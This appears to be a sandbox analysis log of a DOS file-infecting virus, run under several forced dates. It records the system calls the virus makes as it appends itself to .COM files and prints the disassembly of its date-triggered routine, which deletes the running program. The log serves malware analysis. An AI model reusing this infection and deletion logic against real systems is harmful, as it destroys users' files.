2018-12-25T12:38:09.343401892Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.352162579Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.355061724Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.36273075Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.369833938Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.371317414Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.373465532Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.376564218Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.378124846Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.381700013Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.387905542Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.390443597Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.398126382Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.405802729Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.407254278Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.409017601Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.412798039Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.414663026Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.417909053Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.426823965Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.429817766Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.437087603Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.444428343Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.445889818Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.447355434Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.450818901Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.452601188Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.455472691Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.464307376Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.467980442Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.474999455Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.482326074Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.48386314Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.485504254Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.488821305Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.49049903Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.494621131Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.503909312Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.507167822Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.514395098Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.521523053Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.524399272Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.5264877Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.529530948Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.532026617Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.536044474Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.544870362Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.548952997Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.556405824Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.559212659Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.561390635Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.56326078Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.566104874Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.56737224Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.576389987Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.585222067Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.587796858Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:38:09.59023815Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-25T12:38:09.592929891Z 0 PC: 12a44 | Program terminate

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13372,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:09.403598724Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:38:09.405143092Z 78 PC: 12ae8 | Find first file
2018-12-25T12:38:09.409277899Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:09.413372054Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:09.417904523Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:38:09.419347903Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:38:09.420675741Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:38:09.423674487Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:38:09.431327853Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:38:09.444543239Z 62 PC: 12ba8 | Close file
2018-12-25T12:38:09.452406186Z 79 PC: 12af1 | Find next file
2018-12-25T12:38:09.45537376Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.461659365Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.46776425Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.469430574Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.486676845Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.48877482Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.490149971Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.492546052Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.500229788Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.503665461Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.510561249Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.516937842Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.51870966Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.520071701Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.522798877Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.524705035Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.527219094Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.534625775Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.537478538Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.543875537Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.550406981Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.551918764Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.553349889Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.556091114Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.558093579Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.560989772Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.568838974Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.572293455Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.57899201Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.585454178Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.587805865Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.589228642Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.591844302Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.597161574Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.59991569Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.607512186Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.610696356Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.618219806Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.625059034Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.627036885Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.629287545Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.631979662Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.633333406Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.637912721Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.646373125Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.649133297Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.656837823Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.663267606Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.664772815Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.667836115Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.670525514Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.671950687Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.675499895Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.683548761Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.686434452Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.694622039Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.697447071Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.69910251Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.701492652Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.708733901Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.710492064Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.719209563Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.727402873Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.729730572Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:38:09.731420194Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-25T12:38:09.733643868Z 0 PC: 12a44 | Program terminate

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13372,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:09.439556056Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:38:09.441727911Z 78 PC: 12ae8 | Find first file
2018-12-25T12:38:09.447887461Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:09.454547758Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:09.46094735Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:38:09.467290781Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:38:09.468330326Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:38:09.470186039Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:38:09.4718727Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:38:09.483379193Z 62 PC: 12ba8 | Close file
2018-12-25T12:38:09.491278489Z 79 PC: 12af1 | Find next file
2018-12-25T12:38:09.494161549Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.498565456Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.505175449Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.507019853Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.508333805Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.510924027Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.512896194Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.515438384Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.522824858Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.533134863Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.539488457Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.545723215Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.550561735Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.552126805Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.554924718Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.557476605Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.560139278Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.567667645Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.570214559Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.577269956Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.583834756Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.58509131Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.58716153Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.592876808Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.594504816Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.598011843Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.61456985Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.617196628Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.624552012Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.630843244Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.632306376Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.63485013Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.637743601Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.639590952Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.642672537Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.65148656Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.654444208Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.661799907Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.669269372Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.676122348Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.685353197Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.688938153Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.690533887Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.694204894Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.70750805Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.710533731Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.717092216Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.724168886Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.72635116Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.727682152Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.731235321Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.732627252Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.735218589Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.743482091Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.746022545Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.75237038Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.755110908Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.75683607Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.758409155Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.761512331Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.763724527Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.786831786Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.79580885Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.79967398Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:38:09.800775572Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-25T12:38:09.80311407Z 65 PC: 12bd6 | Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:38:09.815311042Z 0 PC: 12a44 | Program terminate